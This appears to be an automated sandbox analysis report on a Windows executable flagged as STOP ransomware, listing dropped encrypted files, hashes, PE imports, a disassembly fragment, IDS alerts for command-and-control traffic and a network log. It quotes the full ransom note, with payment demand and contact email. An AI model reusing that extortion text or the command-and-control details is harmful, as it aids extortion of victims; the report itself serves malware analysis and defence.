                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.9969931080654435
                                                                                                                          Encrypted:true
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.997102900259094
                                                                                                                          Encrypted:true
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.99762408349614
                                                                                                                          Encrypted:true
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.996928043079858
                                                                                                                          Encrypted:true
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.997653087868866
                                                                                                                          Encrypted:true
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74540
                                                                                                                          Entropy (8bit):7.997377743762606
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:Rt3OzRYPrBO3lc4nF8yg+oH0HVRC45631Ek:/OzRY1yc4nyy7oH0HVRF56FEk
                                                                                                                          MD5:22B7FFAFEF865116427AA8E1B704208A
                                                                                                                          SHA1:30008894B7BF9EA2B91CD7CD2DAE82F3194A0D40
                                                                                                                          SHA-256:1CA2AE6E66B2F034FBF204539BBAFDC515D98902D016F921E364F42C9A7A23C5
                                                                                                                          SHA-512:1ED52E6705B8D743ECB7F48343A744A36765D0511C322E208BB9EB24FDD9255B714FA95041FC5345666CB732E53D9325A43E7C176C3B7D9F083D1ED53CAD5544
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.997343302822231
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MkynpxqaCnbFIrl6oKcmm8pFDHTc4r+Rify5DZ81NNXSBqe90mhFBbhEWX1m:M5pcaCbacoxmXDHQ7rZ8HNYOx
                                                                                                                          MD5:676C74169967613BEAAE4E55B7356576
                                                                                                                          SHA1:1817E1AE055DD0A2F31E0BEE263BF160F81F7991
                                                                                                                          SHA-256:579884E611790B89A7ACE2588E0ED541366CF412A760E84A2B21666BC4119A09
                                                                                                                          SHA-512:401626E8CC195E24AF62877447B8376D590DBDB62EAE50B97C4342BF35730D26DB925F6A0C9C956D2C0C5D0B62A2996F056A0B45BACA9E6DBE720E22A8A13BDF
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42164934
                                                                                                                          Entropy (8bit):7.947662803306286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:786432:XwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59E:AQcWxDMPnN+dk65gGUjku4vNjLjE
                                                                                                                          MD5:3F11CDDCA921671B0F182E67C6658425
                                                                                                                          SHA1:2CF0C4A725FB93637037BF12F505A64358E800CE
                                                                                                                          SHA-256:8318085E88234BA08A21E8E449C946C91C4C629099F69348CF6C71334BCA0F59
                                                                                                                          SHA-512:15F2D2E59FB51522A35435412978BC5CEDDCAB0E18D5D40DA60B39AC2E60A2E9F069EA93D6052DE17F9ABB432B8101A828A319C858E155D996A8396FB9A8F6D5
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1031
                                                                                                                          Entropy (8bit):7.791444397670549
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tarFjT3p29DMuyO3WYsKIS8Q0iprxXF+0hfoozmgv+bD:wJj929QWWZhxinF+0hf6BD
                                                                                                                          MD5:8DE5FA156277731D6ABDA92994182EA1
                                                                                                                          SHA1:357779537E3BC7A1238369B162452594543E862B
                                                                                                                          SHA-256:9318ED9E127F3AB0A97CED2968BC0BE30C86B18F75E4D5D54B78F836F22B1783
                                                                                                                          SHA-512:3F1C43F15ED595E98C3328B777294426A26CCAEA621086631D973DB0B7069B3963CBC6FD70199018146C27FF4718679CCE536CF15FE62F0A5D0BBFD4FFB4B847
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.966504954439117
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Bgkrnsac3ui3XHTvyKo49UB/mdMZeAAZHrrbekpZ17dMNlcaCgzvpPuXZbsQCNzn:BRnsaPiTqKJdMZ3OHrnpZ172NxjvpWXs
                                                                                                                          MD5:956439A2AF2EC5F8FD5CB92EC75C80A6
                                                                                                                          SHA1:6D584F6106C4EB19D07DE2BD32BD794ED2486645
                                                                                                                          SHA-256:08549B360A06A1169BD482981C1009BA7131705ED87C97B815582E8909A9F8E7
                                                                                                                          SHA-512:F3EBA9EDC5938E6244A25A470E0B0A2AD50C43A4CB399206909F1E368D9A992EAFE73FC1641A8556E316CA7C810EDEB2717FE4958B1553EE54B576C7840CF468
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.971644330675514
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:j3JRx+TXqBeUx5JdQGwLajo2cZBqBU4HJy5DYbP+DIbCYbnu6hqTBRwUamjrm:TJR6a0Ux5Jdjn/BX2EqIbCC0BRJa
                                                                                                                          MD5:A2933FA70957AF6A556505C22DDA5071
                                                                                                                          SHA1:67F0ADF5F3379F7E040B41CF7B4C05BA6D01803E
                                                                                                                          SHA-256:E65A42D1B72BDB2651D3C6C3EAAFC6BE3EC8B576C302E4C4F69C4423E56ED7EA
                                                                                                                          SHA-512:B8A92612E47263A752F00C8056298E69A7F7F3097B75623A01C3C07A846B7682B01396BB2D5ADB40C2D47DF3DED13AE801B56EA485C57349C4AE615D717964EF
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.969210732176863
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yNfKdE3Chv3OX2NPj5RmiH0qWB8vNYgl3zrgI5hKl0sBJ6sPHrsE8aWzfwT4V115:bE3Chv+X2VjrmNCi0vnql0sBFvdkwTsd
                                                                                                                          MD5:731208DB8E5F4B056A29B000B6F67974
                                                                                                                          SHA1:928F35917B1A07C1D889823F508594418CDF885A
                                                                                                                          SHA-256:D64A76C0F77E01CB468CF39E88EEF98F191CF78B08B5723A4866EB61DCDC09F6
                                                                                                                          SHA-512:083D8131E4F5B875F804B4557977951669ED7F31BB98E599688C62AF2DF34D5E28FCCD3DA1AD4762397F5C0A19905B19A7FA743CE4B896ED2FA3A900BA1B6E1D
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.9717368275538085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:6N4YXcLxnenyNtSeGoQnZ9gaIGfVSPR3o+yTaUhI3TzU4x8eHETp5XaSwrrQgpr0:MQxe4tSv9YcVkR3LyTOTY4AT7lASm5m
                                                                                                                          MD5:9FC21C4960B54572B4E2C4659ACE873A
                                                                                                                          SHA1:9A4E84BFD7C56C1CD0FCD3604C8EDAFB3FDA0AEB
                                                                                                                          SHA-256:78942BBFEA6C1BF52CF16266EA334EBB6097F53E132ED7A9930DA7D17874759D
                                                                                                                          SHA-512:675032ED5C8783A737769D3D3ECFA6913293D92294A9D6978946052EACF88722B71D54696751EEB1B3350A62864ED1E70B8E58411D9613F5E51DB6E13C80F090
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1193
                                                                                                                          Entropy (8bit):7.835252415559237
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:DwTyQsCmy94KIjcZLNPaprxGq5d3gBirDsVU6JLxMevMUwuubD:DwGy94BjqC3gEelM2MrTD
                                                                                                                          MD5:4FD5012A93C09ACDD723EF234F47618D
                                                                                                                          SHA1:CA4A2F3C2FB75D02BAC179489BF807EFB49DF11A
                                                                                                                          SHA-256:751077FC4AC7996C2F6A9FCD3D63DEA695D3687E498E3A9B23254E4014F12C1F
                                                                                                                          SHA-512:0929052B1AFF447B02128830DE20F893385AE9B63BDBFD422DCF7A5BC7A9C9B522A5A920FB5C5C9B7198D660F702213951F405B15A2D27904FB8F3B39227A64B
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1193
                                                                                                                          Entropy (8bit):7.835252415559237
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:DwTyQsCmy94KIjcZLNPaprxGq5d3gBirDsVU6JLxMevMUwuubD:DwGy94BjqC3gEelM2MrTD
                                                                                                                          MD5:4FD5012A93C09ACDD723EF234F47618D
                                                                                                                          SHA1:CA4A2F3C2FB75D02BAC179489BF807EFB49DF11A
                                                                                                                          SHA-256:751077FC4AC7996C2F6A9FCD3D63DEA695D3687E498E3A9B23254E4014F12C1F
                                                                                                                          SHA-512:0929052B1AFF447B02128830DE20F893385AE9B63BDBFD422DCF7A5BC7A9C9B522A5A920FB5C5C9B7198D660F702213951F405B15A2D27904FB8F3B39227A64B
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1114
                                                                                                                          Entropy (8bit):4.8507609806808425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuW6mFRqrl3W4kA+GT/kF5M2/kLw3KTJ9:WZHfv0p6W6PFWrDGT0f/krL
                                                                                                                          MD5:C9EBD4B64892564AAC94137841AD9D33
                                                                                                                          SHA1:B4EA6ADA547A695BDEBAF7F06B0EFFD927BFF4AF
                                                                                                                          SHA-256:6D8E4E47B5EBCAF5E3AFD98F217D5BF60E40B9031C5DE191D51AAE8B57515B2B
                                                                                                                          SHA-512:C515C0F63CA4C23E4FF2D673AAF4DF1F9F4CFDC90C5E7205EA161B9DC81F69AC329775876E26E4BF4DC18D9229ED82B2512D9872B44FA4F22CFFE61F212EF328
                                                                                                                          Malicious:true
                                                                                                                          Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-eyUsqpKbFl..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):6.657215273984881
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5:de93e8a0692db2c2f178270b8da7b5d7
                                                                                                                          SHA1:21df7a70852c9d47b3423d14005bf67a69e6fdcc
                                                                                                                          SHA256:1ca8ad78274a829697b8381e96b914fea1a65b5b2351f536325d2143d689426e
                                                                                                                          SHA512:55b21170027f3e3dc2ca8f1d6678b054f270ca7d5e9ac71eec7a4e630ed007a0de07bcb8134431fb4a0d4c99fabf235911cc0322080920bb407748e4422b0d4a
                                                                                                                          SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8UWQHUq7:F0dwAYZt6C31WeTVRPOhU7Uq7
                                                                                                                          TLSH:B735AE02BB819171E5D341BA0DFE977E883AA9A0933A95C3D7E91C568E306D0673F3C5
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l.....7.f.......+/..*...h.....9.m...../.m...a|..Q...a|7.s...a|........&.n.....8.n.....#.M...l...........d...a|3.m..
                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                          Entrypoint:0x424141
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x5D890137 [Mon Sep 23 17:30:31 2019 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:0c756c849bc7b459f78f7a5ce46cd4a7
                                                                                                                          Instruction
                                                                                                                          call 00007FE87976DB02h
                                                                                                                          jmp 00007FE87975F7FEh
                                                                                                                          jmp 00007FE87975FB1Ch
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push dword ptr [ebp+18h]
                                                                                                                          push dword ptr [ebp+14h]
                                                                                                                          push dword ptr [ebp+10h]
                                                                                                                          push dword ptr [ebp+0Ch]
                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                          call 00007FE87975FB5Bh
                                                                                                                          int3
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          sub esp, 00000328h
                                                                                                                          mov eax, dword ptr [0050AD20h]
                                                                                                                          xor eax, ebp
                                                                                                                          mov dword ptr [ebp-04h], eax
                                                                                                                          cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                          push edi
                                                                                                                          je 00007FE87975F9CBh
                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                          call 00007FE87976E2A4h
                                                                                                                          pop ecx
                                                                                                                          and dword ptr [ebp-00000320h], 00000000h
                                                                                                                          lea eax, dword ptr [ebp-0000031Ch]
                                                                                                                          push 0000004Ch
                                                                                                                          push 00000000h
                                                                                                                          push eax
                                                                                                                          call 00007FE879766C43h
                                                                                                                          lea eax, dword ptr [ebp-00000320h]
                                                                                                                          add esp, 0Ch
                                                                                                                          mov dword ptr [ebp-00000328h], eax
                                                                                                                          lea eax, dword ptr [ebp-000002D0h]
                                                                                                                          mov dword ptr [ebp-00000324h], eax
                                                                                                                          mov dword ptr [ebp-00000220h], eax
                                                                                                                          mov dword ptr [ebp-00000224h], ecx
                                                                                                                          mov dword ptr [ebp-00000228h], edx
                                                                                                                          mov dword ptr [ebp-0000022Ch], ebx
                                                                                                                          mov dword ptr [ebp-00000230h], esi
                                                                                                                          mov dword ptr [ebp-00000234h], edi
                                                                                                                          mov word ptr [ebp-00000208h], ss
                                                                                                                          mov word ptr [ebp-00000214h], cs
                                                                                                                          mov word ptr [ebp-00000238h], ds
                                                                                                                          mov word ptr [ebp-0000023Ch], es
                                                                                                                          mov word ptr [ebp-00000240h], fs
                                                                                                                          mov word ptr [ebp+0000FDBCh], gs
                                                                                                                          Programming Language:
                                                                                                                          • [ASM] VS2013 UPD5 build 40629
                                                                                                                          • [ C ] VS2013 UPD5 build 40629
                                                                                                                          • [C++] VS2013 build 21005
                                                                                                                          • [ASM] VS2013 build 21005
                                                                                                                          • [ C ] VS2013 build 21005
                                                                                                                          • [RES] VS2013 build 21005
                                                                                                                          • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1085d0 | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12b000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12c000 | 0xa32c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xcc460 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x105ac8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xcc000 | 0x3f0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xca5bc | 0xca600 | False | 0.5030461029184682 | data | 6.570129941575212 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xcc000 | 0x3dba2 | 0x3dc00 | False | 0.39569758982793524 | data | 5.668210848214326 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x10a000 | 0x20358 | 0x6400 | False | 0.4978125 | data | 4.939624310736174 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x12b000 | 0x1e0 | 0x200 | False | 0.533203125 | data | 4.7176788329467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12c000 | 0xa32c | 0xa400 | False | 0.6199980945121951 | data | 6.612523450234696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x12b060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
RPCRT4.dll | RpcStringFreeW, UuidCreate, UuidToStringW, RpcStringFreeA, UuidToStringA
MPR.dll | WNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
WININET.dll | InternetCloseHandle, InternetReadFile, InternetOpenUrlW, InternetOpenW, HttpQueryInfoW, InternetOpenA, InternetOpenUrlA
WINMM.dll | timeGetTime
SHLWAPI.dll | PathAppendA, PathFindFileNameW, PathRemoveFileSpecW, PathFileExistsA, PathFileExistsW, PathAppendW, PathFindExtensionW
KERNEL32.dll | VirtualFree, WriteFile, GetDriveTypeA, OpenProcess, GlobalAlloc, GetSystemDirectoryW, WideCharToMultiByte, LoadLibraryW, Sleep, CopyFileW, FormatMessageW, lstrcpynW, CreateProcessA, TerminateProcess, ReadFile, CreateFileW, lstrcatA, GetEnvironmentVariableA, lstrcmpW, MultiByteToWideChar, lstrlenW, FlushFileBuffers, GetShortPathNameA, GetFileSizeEx, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, MoveFileW, FindClose, Process32FirstW, LocalAlloc, CreateEventW, GetModuleFileNameA, Process32NextW, lstrcatW, CreateMutexA, FindNextFileW, CreateToolhelp32Snapshot, SetEnvironmentVariableA, DeleteFileW, LocalFree, lstrcpyW, DeleteFileA, lstrcpyA, SetPriorityClass, GetCurrentProcess, GetComputerNameW, GetLogicalDrives, GetModuleFileNameW, SetStdHandle, GetVersion, CreateDirectoryA, CreateThread, CompareStringW, GetTimeFormatW, GetDateFormatW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleA, GetVersionExA, GlobalMemoryStatus, LoadLibraryA, FlushConsoleInputBuffer, WaitForSingleObject, CreateDirectoryW, SetFilePointerEx, CreateProcessW, FreeLibrary, SetErrorMode, lstrlenA, SetFilePointer, FindFirstFileW, SetConsoleMode, CreateFileA, GetCommandLineW, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetTimeZoneInformation, RaiseException, GetStringTypeW, GetConsoleCP, ReadConsoleW, GetConsoleMode, HeapSize, LoadLibraryExW, OutputDebugStringW, SetConsoleCtrlHandler, RtlUnwind, FatalAppExitA, GetStartupInfoW, GetExitCodeProcess, LCMapStringW, DeleteCriticalSection, AreFileApisANSI, ExitProcess, GetProcessHeap, HeapReAlloc, GlobalFree, SetEndOfFile, ReadConsoleInputA, CloseHandle, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, GetModuleHandleExW, WriteConsoleW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCurrentThread, GetCurrentThreadId
USER32.dll | PeekMessageW, PostThreadMessageW, DefWindowProcW, DispatchMessageW, UpdateWindow, CreateWindowExW, LoadCursorW, IsWindow, ShowWindow, RegisterClassExW, PostQuitMessage, GetMessageW, DestroyWindow, SendMessageW, GetProcessWindowStation, GetUserObjectInformationW, MessageBoxA, GetDesktopWindow, MessageBoxW, TranslateMessage
ADVAPI32.dll | RegCloseKey, CloseServiceHandle, GetUserNameW, ReportEventA, RegisterEventSourceA, DeregisterEventSource, CryptHashData, RegSetValueExW, CryptDestroyHash, ControlService, RegOpenKeyExW, CryptCreateHash, CryptEncrypt, CryptImportKey, QueryServiceStatus, RegQueryValueExW, CryptReleaseContext, OpenServiceW, OpenSCManagerW, CryptAcquireContextW, CryptGetHashParam
SHELL32.dll | SHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteA, ShellExecuteExW, CommandLineToArgvW, SHGetFolderPathA
ole32.dll | CoInitialize, CoInitializeSecurity, CoUninitialize, CoCreateInstance
OLEAUT32.dll | SysFreeString, VariantInit, VariantClear, GetErrorInfo, CreateErrorInfo, SetErrorInfo, VariantChangeType, SysAllocString
IPHLPAPI.DLL | GetAdaptersInfo
WS2_32.dll | inet_ntoa, inet_addr, gethostbyname
DNSAPI.dll | DnsFree, DnsQuery_W
CRYPT32.dll | CryptStringToBinaryA
GDI32.dll | DeleteObject, GetObjectA, SelectObject, GetDeviceCaps, GetBitmapBits, BitBlt, DeleteDC, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/16/24-00:41:03.506186 | TCP | 2833438 | ETPRO TROJAN STOP Ransomware CnC Activity | 49733 | 80 | 192.168.2.4 | 175.119.10.231
01/16/24-00:41:20.984825 | TCP | 2833438 | ETPRO TROJAN STOP Ransomware CnC Activity | 49746 | 80 | 192.168.2.4 | 175.119.10.231
01/16/24-00:41:09.184797 | TCP | 2833438 | ETPRO TROJAN STOP Ransomware CnC Activity | 49736 | 80 | 192.168.2.4 | 175.119.10.231
01/16/24-00:41:15.342258 | TCP | 2833438 | ETPRO TROJAN STOP Ransomware CnC Activity | 49737 | 80 | 192.168.2.4 | 175.119.10.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                          Jan 16, 2024 00:40:58.717139006 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.717139959 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.726283073 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.726303101 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:59.871066093 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:59.871191025 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:59.871315002 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:59.880713940 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:59.880753994 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.090859890 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.091046095 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.113570929 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.113650084 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.114176035 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.114272118 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.124228001 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.165904045 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.593816996 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.593955040 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.594036102 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.594103098 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.594970942 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.595010042 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.755898952 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.755922079 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.756007910 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.766473055 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.766484976 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.971697092 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.971820116 CET49731443192.168.2.4172.67.139.220
